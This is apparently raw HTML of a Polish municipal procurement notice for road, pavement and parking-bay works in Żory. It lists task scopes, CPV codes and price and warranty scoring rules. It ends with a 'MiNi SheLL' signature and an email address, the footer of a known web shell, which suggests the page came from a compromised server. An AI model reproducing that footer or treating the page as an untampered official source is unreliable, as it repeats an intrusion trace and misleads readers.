	wykonanie warstwy odsączającej z piasku na poszerzeniach,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe na poszerzenie,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych jezdni z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt grafitowa, eko-kostka szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	ułożenie rur osłonowych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 3  Wykonanie zatoki parkingowej przy Al. Zjednoczonej Europy
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie stabilizacji gruntu cementem,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy z betonu cementowego w zatoce,
	wykonanie nowej podbudowy tłuczniowej pod chodnikiem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych zatoki z kostki granitowej 15x15 cm na podsypce cementowo-piaskowej z wypełnieniem spoin betonem,
	wykonanie nawierzchni brukowej dojścia z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	ułożenie rur osłonowych,
	przestawienie barier ochronnych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 4  Wykonanie zatoki parkingowej przy ul. Astrów w Żorach
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni brukowej zatoki i chodnika z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara, linie segregacyjne z kostki prostokątnej czerwonej),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek,
	ułożenie rur osłonowych,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 5  Wykonanie zatoki parkingowej przy ul. Męczenników Oświęcimskich
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni brukowej zatoki z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara, linie segregacyjne z kostki prostokątnej czerwonej),
	przełożenie nawierzchni istniejącego chodnika z kostki betonowej,
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek,
	ułożenie rur osłonowych,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 6  Wykonanie chodnika przy ul. Przemysłowej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, krawężników betonowych na ławie betonowej z oporem,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nowe nawierzchnie brukowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45112700-2,
                    45233142-6,
                    45233222-1,
                    45232130-2,
                    45231110-9,
                    34922100-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Koszt wykonania (cena)</td><td>60</td></tr><tr><td>Okres gwarancji na roboty budowlane </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Sprecyzowanie kryteriów oceny ofert:
w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena  zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 60 
Oferta z najniższą ceną otrzyma 60 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 60 - wskaźnik stały,

w kryterium 2 okres gwarancji na roboty budowlane ocena punktowa przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej od 36 do 59 miesięcy	- 0 punktów
2)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 40 punktów 
W niniejszym kryterium Wykonawca może uzyskać maksymalnie 40 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp). <br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Nawierzchnie asfaltowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie 1  Wykonanie zjazdu z ul. Małej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zjazd,
	załadunek i wywóz materiałów z korytowania,
	wykonanie przepustu drogowego z rur betonowych 400 na ławie żwirowej z wykonaniem izolacji i murków czołowych betonowych,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni z betonu asfaltowego,
	wykonanie poboczy z tłucznia kamiennego,
	wykonanie oznakowania pionowego,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 2  Przebudowa skrzyżowania Al. Armii Krajowej z ul. Komunalną.
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej i krawężników,
	frezowanie nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nawierzchnie asfaltobotonowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie stabilizacji gruntu cementem,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	ułożenie krawężników betonowych na ławie betonowej,
	wykonanie podbudowy z betonu asfaltowego,
	wykonanie warstwy wiążącej z betonu asfaltowego,
	wykonanie warstwy ścieralnej z mieszanki SMA,
	regulacja pionowa studzienek z wymianą włazów na typ ciężki,
	wykonanie oznakowania poziomego i pionowego,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 3  Modernizacja drogi bocznej od ul. Kłapczyka
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej i krawężników,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod krawężniki,
	załadunek i wywóz materiałów z korytowania,
	wyrównanie istniejącej podbudowy tłuczniem,
	ułożenie krawężników betonowych na ławie betonowej,
	wykonanie nawierzchni z betonu asfaltowego,
	regulacja pionowa studzienek, zaworów i zasuw,
	przebrukowanie istniejących zjazdów,
	wykonanie wpustu deszczowego wraz z przykanalikiem i podłączeniem do istniejącej studni,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 4  Przebudowa drogi ul. Kłapczyka pomiędzy skrzyżowaniami z Al. Wojska Polskiego i ul. Prusa
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod poszerzenie,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku na poszerzeniu,
	wykonanie nowej podbudowy tłuczniowej na poszerzeniu,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na poszerzeniu
	regulacja pionowa studzienek, zaworów i zasuw,
	przebrukowanie istniejących zjazdów i chodnika,
	wykonanie oznakowania poziomego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45112700-2,
                    45233142-6,
                    45233222-1,
                    45232130-2,
                    45231110-9,
                    34922100-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Koszt wykonania (cena)</td><td>60</td></tr><tr><td>Okres gwarancji na roboty budowlane </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Sprecyzowanie kryteriów oceny ofert:
w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena  zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 60 
Oferta z najniższą ceną otrzyma 60 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 60 - wskaźnik stały,

w kryterium 2 okres gwarancji na roboty budowlane ocena punktowa przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej od 36 do 59 miesięcy	- 0 punktów
2)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 40 punktów 
W niniejszym kryterium Wykonawca może uzyskać maksymalnie 40 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp). <br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com